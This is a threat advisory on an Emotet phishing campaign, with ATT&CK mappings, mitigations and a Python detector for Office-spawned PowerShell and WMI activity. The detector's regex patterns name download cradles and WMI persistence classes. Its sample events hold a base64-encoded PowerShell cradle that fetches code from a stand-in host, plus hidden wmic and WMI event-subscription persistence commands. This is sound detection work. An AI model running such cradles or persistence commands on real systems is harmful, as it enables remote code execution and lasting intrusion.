1. Threat Overview
A new variant of the Emotet malware has been detected, primarily affecting users in Eastern Europe, using phishing emails with malicious Office documents as the attack vector.
2. Key Intelligence Points
1. Emotet is being distributed via phishing emails carrying malicious, macro-enabled Word and Excel documents. Note that Emotet is a malware family, not a vulnerability: the CVE-2022-30190 identifier sometimes attached to it refers to the Microsoft Support Diagnostic Tool (MSDT) "Follina" bug, and nothing in this report indicates that CVE is exploited in this campaign.
2. The malware is primarily affecting users in Eastern Europe, with a focus on Ukraine and Russia.
3. Emotet uses a combination of PowerShell and WMI to establish persistence on infected systems.
4. Detection opportunities include monitoring Office document interactions (Office processes such as WINWORD.EXE or EXCEL.EXE spawning script interpreters or shells) and unusual PowerShell activity (hidden windows, encoded command lines, download cradles).
3. MITRE ATT&CK Techniques
T1566.001 Phishing: Spearphishing Attachment
T1204.002 User Execution: Malicious File (T1204.001 is Malicious Link; the macro-enabled document described here is a malicious file)
T1059.001 Command and Scripting Interpreter: PowerShell
T1047 Windows Management Instrumentation
4. Indicators of Compromise (IOCs) / Affected Systems
- Emotet malware, reported as version 5.2.2.0
- Macro-enabled Word document delivered as an email attachment
- 'win32k.sys' registry key, as reported; win32k.sys is the name of a Windows kernel driver, so validate this value against a sample before using it as a detection
No file hashes, domains or IP addresses are provided, so these are descriptors of the campaign rather than atomic indicators that can be loaded directly into a blocklist.
5. Mitigation & Detection
Users should be cautious when opening Office documents from unknown sources, and macros should be disabled by policy rather than left to the user prompt, including blocking macros in files that carry the Mark-of-the-Web. Filtering macro-enabled attachments (.docm, .xlsm) at the mail gateway and alerting on Office processes that spawn PowerShell, WMI or other script hosts give defenders the earliest points at which an Emotet infection can be stopped.
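The following detection logic is an added example and is not code from the original report. It implements the two detection opportunities named above (Office processes spawning script hosts, and unusual PowerShell or WMI command lines) over constructed process-creation records carrying the parent image, image and command line fields of a Sysmon Event ID 1 or Windows 4688 event. The regular expressions are heuristics chosen for this example, the sample events are constructed to mimic the described tradecraft, and the WMI persistence check assumes permanent event subscriptions, which the report does not specify.

```python
"""Flag Office-spawned script hosts and suspicious PowerShell/WMI command lines.

Added example, not code from the original advisory. Input records are
constructed process-creation events with the three fields a Sysmon Event ID 1
or Windows 4688 record carries (parent image, image, command line).
"""
import base64
import re
from dataclasses import dataclass
from typing import List, Optional

# Office hosts that should almost never spawn a shell or script interpreter.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Children that, under an Office parent, indicate a macro handing off execution.
SUSPICIOUS_CHILDREN = {"powershell.exe", "pwsh.exe", "wmic.exe", "cmd.exe", "mshta.exe",
                       "wscript.exe", "cscript.exe", "rundll32.exe", "regsvr32.exe"}
# PowerShell switches typical of macro-launched stagers: hidden window, no profile, policy bypass.
PS_EVASION_FLAGS = re.compile(
    r"(?i)(?:^|\s)-(?:nop|noprofile|w(?:indowstyle)?\s+hidden|ep\s+bypass|"
    r"executionpolicy\s+bypass|noni|noninteractive)\b")
ENCODED_CMD = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
DOWNLOAD_CRADLE = re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b|"
                             r"net\.webclient|\biex\b|invoke-expression")
# WMI permanent event subscription pieces (ATT&CK T1546.003); assumed persistence mechanism.
WMI_PERSISTENCE = re.compile(r"(?i)__EventFilter|CommandLineEventConsumer|"
                             r"__FilterToConsumerBinding|Register-WmiEvent|Set-WmiInstance")


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


@dataclass
class Alert:
    event: ProcessEvent
    reasons: List[str]


def basename(path: str) -> str:
    """Lower-cased file name from a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Decode a -EncodedCommand argument (base64 of UTF-16LE) or return None."""
    m = ENCODED_CMD.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except ValueError:  # binascii.Error and UnicodeDecodeError are both ValueErrors
        return None


def analyze(event: ProcessEvent) -> List[str]:
    """Return the reasons this event is suspicious (empty list if none)."""
    reasons = []
    parent, child = basename(event.parent_image), basename(event.image)
    if parent in OFFICE_PARENTS and child in SUSPICIOUS_CHILDREN:
        reasons.append(f"office parent: {parent} spawned {child}")
    if child in ("powershell.exe", "pwsh.exe"):
        # Inspect the decoded payload when -enc is used, otherwise the raw command line.
        decoded = decode_encoded_command(event.command_line)
        body = decoded if decoded is not None else event.command_line
        if PS_EVASION_FLAGS.search(event.command_line):
            reasons.append("powershell: hidden window / no profile / policy bypass flags")
        if decoded is not None:
            reasons.append("powershell: base64-encoded command")
        if DOWNLOAD_CRADLE.search(body):
            reasons.append("powershell: download cradle")
        if WMI_PERSISTENCE.search(body):
            reasons.append("wmi: event subscription persistence")
    if child == "wmic.exe" and re.search(r"(?i)process\s+call\s+create", event.command_line):
        reasons.append("wmi: process creation via wmic")
    return reasons


def scan(events: List[ProcessEvent]) -> List[Alert]:
    """Run analyze() over a batch and keep only events with at least one reason."""
    return [Alert(e, r) for e in events if (r := analyze(e))]


def _encode_ps(script: str) -> str:
    """Build a -EncodedCommand argument the way PowerShell expects (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events: the first three mimic the tradecraft in the advisory
# (macro -> PowerShell stager, macro -> wmic, macro -> PowerShell WMI persistence);
# the last two are ordinary administrative activity that must not alert.
OFFICE16 = r"C:\Program Files\Microsoft Office\root\Office16"
PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcessEvent(OFFICE16 + r"\WINWORD.EXE", PS_EXE,
                 "powershell.exe -nop -w hidden -enc "
                 + _encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')")),
    ProcessEvent(OFFICE16 + r"\EXCEL.EXE", r"C:\Windows\System32\wbem\WMIC.exe",
                 'wmic.exe process call create "powershell -w hidden -ep bypass -c Start-Process calc"'),
    ProcessEvent(OFFICE16 + r"\WINWORD.EXE", PS_EXE,
                 "powershell.exe -nop -c \"Set-WmiInstance -Namespace root\\subscription "
                 "-Class __EventFilter -Arguments @{Name='upd'}\""),
    ProcessEvent(r"C:\Windows\explorer.exe", PS_EXE,
                 r"powershell.exe -File C:\scripts\nightly-backup.ps1"),
    ProcessEvent(r"C:\Windows\System32\services.exe", r"C:\Windows\System32\svchost.exe",
                 "svchost.exe -k netsvcs"),
]


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(basename(alert.event.parent_image), "->", basename(alert.event.image))
        for reason in alert.reasons:
            print("   ", reason)
```

The parent/child pairing is the highest-signal rule and needs no tuning; the command-line regexes will produce occasional hits on legitimate administration scripts, so in production they are best used to raise the score of an Office-spawned process rather than to alert on their own.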